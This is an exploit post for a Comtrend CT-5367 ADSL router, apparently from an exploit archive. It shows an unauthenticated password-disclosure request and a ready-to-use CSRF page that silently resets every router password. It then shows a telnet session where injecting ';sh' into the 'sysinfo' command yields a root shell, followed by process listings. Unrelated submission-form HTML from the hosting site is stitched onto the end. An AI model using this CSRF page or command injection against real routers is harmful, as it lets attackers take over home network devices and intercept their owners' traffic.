/*COMTREND ADSL Router BTC(VivaCom) CT-5367 C01_R12Remote Root ============================================================================= Board ID : 96338A-122 Software : A111-312BTC-C01_R12 Bootloader : 1.0.37-12.1-1 Wireless Driver : 4.170.16.0.cpe2.1sd ADSL : A2pB023k.d20k_rc2 ============================================================================= Type : HardWare Risk of use : High Type to use : Remote Discovered by : Todor Donev Author Email : todor.donev@gmail.com ============================================================================= Special greetz to my sweetheart friend and my lil' secret Tsvetelina Emirska, and all my other friends that support me a lot of times for everything !! */ root@linux:~#get.pl http://192.168.1.1/ /*HTTP/1.1 401 Unauthorized Cache-Control: no-cache Connection: close Date: Sat, 01 Jan 2000 00:04:31 GMT Server: micro_httpd## Yeah !! Bite me :( WWW-Authenticate: Basic realm="DSL Router" Content-Type: text/html <HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD> <BODY BGCOLOR="#cc9999"><H4>401 Unauthorized</H4> Authorization required. <HR> <ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS> </BODY></HTML> */ root@linux:~#get.pl http://192.168.1.1/password.cgi ## Information Disclosure /*HTTP/1.1 200 Ok Cache-Control: no-cache Connection: close Date: Mon, 03 Jan 2000 23:01:25 GMT Server: micro_httpd Content-Type: text/html <html> <head> <meta HTTP-EQUIV='Pragma' CONTENT='no-cache'> <link rel="stylesheet" href='https://www.exploit-db.com/exploits/16275/stylemain.css' type='text/css'> <link rel="stylesheet" href='https://www.exploit-db.com/exploits/16275/colors.css' type='text/css'> <script language="javascript" src="https://www.exploit-db.com/exploits/16275/util.js"></script> <script language="javascript"> <!-- hide\n ## Dammit! =)) pwdAdmin = '<CENSORED>';## Censored Password pwdSupport = '<CENSORED>';## Censored Password pwdUser = '<CENSORED>';\n ## Censored Password */ [CUT EXPLOIT HERE]## CSRF For Change All passwords <html> <head></head> <title>COMTREND ADSL Router BTC(VivaCom) CT-5367 C01_R12 Change All passwords</title> <body onLoad=javascript:document.form.submit()> <form action="http://192.168.1.1/password.cgi"; method="POST" name="form"> <!-- Change default system Passwords to "shpek" without authentication and verification --> <input type="hidden" name="sptPassword" value="shpek"> <input type="hidden" name="usrPassword" value="shpek"> <input type="hidden" name="sysPassword" value="shpek"> </form> </body> </html> [CUT EXPLOIT HERE] root@linux:~# telnet 192.168.1.1 ADSL Router Model CT-5367 Sw.Ver. C01_R12 Login: root Password: ## BINGOO !! Godlike =)) > ? ? help logout reboot adsl atm ddns dumpcfg ping siproxd sntp sysinfo tftp wlan version build ipfilter > sysinfo Number of processes: 30 11:46pmup 2 days, 23:46, load average: 1 min:0.12, 5 min:0.05, 15 min:0.09 total used free sharedbuffers Mem:14012130289840588 Swap:000 Total:1401213028984 > sysinfo ;sh ## JAILBREAK !! FirmWare sucks:) Number of processes: 30 11:47pmup 2 days, 23:47, load average: 1 min:0.07, 5 min:0.05, 15 min:0.08 total used free sharedbuffers Mem:14012130249880588 Swap:000 Total:1401213024988 BusyBox v1.00 (2009.12.08-09:42+0000) Built-in shell (msh) Enter 'help' for a list of built-in commands. # cat /proc/version Linux version 2.6.8.1 (wander@localhost.localdomain) (gcc version 3.4.2) #1 Tue Dec 8 17:40:39 CST 2009 # ps PIDUid VmSize Stat Command 1 root280 S init 2 rootSWN [ksoftirqd/0] 3 rootSW< [events/0] 4 rootSW< [khelper] 5 rootSW< [kblockd/0] 15 rootSW[pdflush] 16 rootSW[pdflush] 17 rootSW[kswapd0] 18 rootSW< [aio/0] 23 rootSW[mtdblockd] 32 root328 S -sh 65 root 1384 S cfm 72 rootSW[bcmsw] 192 root216 S pvc2684d 275 root496 S nas -P /var/wl0nas.lan0.pid -H 34954 -l br0 -i wl0 -A 342 root304 S dhcpd 596 root 1384 S CT_Polling 600 root432 S pppd -c 0.0.35.1 -i nas_0_0_35 -u <CENSORED> -p 931 root248 S dhcpc -i nas_0_0_40 993 root316 S dproxy -D btc-adsl 997 root352 S upnp -L br0 -W ppp_0_0_35_1 -D 1013 root512 S siproxd --config /var/siproxd/siproxd.conf 1014 root512 S siproxd --config /var/siproxd/siproxd.conf 1015 root512 S siproxd --config /var/siproxd/siproxd.conf 10745 root292 S syslogd -C -l 7 10747 root256 S klogd 6616 root 1396 S telnetd 6618 root 1428 S telnetd 6673 root284 S sh -c sysinfo ;sh 6724 root284 R ps # top Mem: 13164K used, 848K free, 0K shrd, 588K buff, 5920K cached Load average: 0.00, 0.02, 0.07(State: S=sleeping R=running, W=waiting) PID USER STATUS RSSPPID %CPU %MEM COMMAND 6751 root R28866750.72.0 exe 2 root SWN0 10.30.0 ksoftirqd/0 6616 root S 1396650.19.9 telnetd 931 root S248 10.11.7 dhcpc 6618 root S 142866160.0 10.1 telnetd 65 root S 1384320.09.8 cfm 596 root S 1384650.09.8 CT_Polling 1013 root S512 10.03.6 siproxd 1014 root S51210130.03.6 siproxd 1015 root S51210140.03.6 siproxd 275 root S496 10.03.5 nas 600 root S432 10.03.0 pppd 997 root S352 10.02.5 upnp 32 root S328 10.02.3 sh 993 root S316 10.02.2 dproxy 6675 root S31666730.02.2 exe 342 root S304 10.02.1 dhcpd 10745 root S292 10.02.0 exe 6673 root S28466180.02.0 sh 1 root S280 00.01.9 init # echo * ## ls o.O?!? bin dev etc lib linuxrc mnt proc sbin usr var webs # </textarea> </li> <li id="text-cont_2"> <label for="extension">Text file extension:</label> <input type="text" name="extension" id="extension" value="txt" class="small" /> </li> <li id="attch_cont" style="display:none;"> <label for="attached_file">Attached file name:</label> <input type="text" name="file_path" id="attached_file" value="" class="large" /> </li> <li> <label for="application_link">Application link:</label> <input type="text" name="application_link" id="application_link" value="" class="large" /> </li> <li> <label for="application_version">Application version:</label> <input type="text" name="application_version" id="application_version" value="" class="large" /> </li> <li> <label for="application_file_name">Application file name:</label> <input type="text" name="application_path" id="application_file_name" value="" class="large" /> </li> <li> <label for="application_md5">Application file md5:</label> <input type="text" name="application_md5" id="application_md5" value="" class="large" /> </li> <li> <label for="cve">CVE code:</label> <input type="text" name="cve" id="cve" value="" class="small" /> </li> <li> <label for="osvdb">OSVDB code:</label> <input type="text" name="osvdb" id="osvdb" value="" class="small" /> </li> <li> <label for="import_as_gd">Add as google dork:</label> <input type="checkbox" name="import_as_gd" id="import_as_gd" value="1" onclick="toggleImportGDform();"/> <ul class="google-dork-import-form" style="display:none;"> <li> <label for="ghdb_status">Status:</label> <select name="ghdb_status" id="ghdb_status"> <option value="1" selected="selected">Active</option> <option value="0">Pending</option> </select> </li> <li> <label for="ghdb_cat_id">Category:</label> <select name="ghdb_cat_id" id="ghdb_cat_id"> <option value="0" selected="selected";>Select category</option> <option value="1">Footholds</option> <option value="2">Files containing usernames</option> <option value="3">Sensitive Directories</option> <option value="4">Web Server Detection</option> <option value="5">Vulnerable Files</option> <option value="6">Vulnerable Servers</option> <option value="7">Error Messages</option> <option value="8">Files containing juicy info</option> <option value="9">Files containing passwords</option> <option value="10">Sensitive Online Shopping Info</option> <option value="11">Network or vulnerability data</option> <option value="12">Pages containing login portals</option> <option value="13">Various Online Devices</option> <option value="14">Advisories and Vulnerabilities</option> </select> </li> <li> <label for="ghdb_title">Title:</label> <input type="text" name="ghdb_title" id="ghdb_title" value="" class="text" /> </li> <li> <label for="ghdb_text">Text:</label> <textarea name="ghdb_text" value="ghdb_text">
体验盒子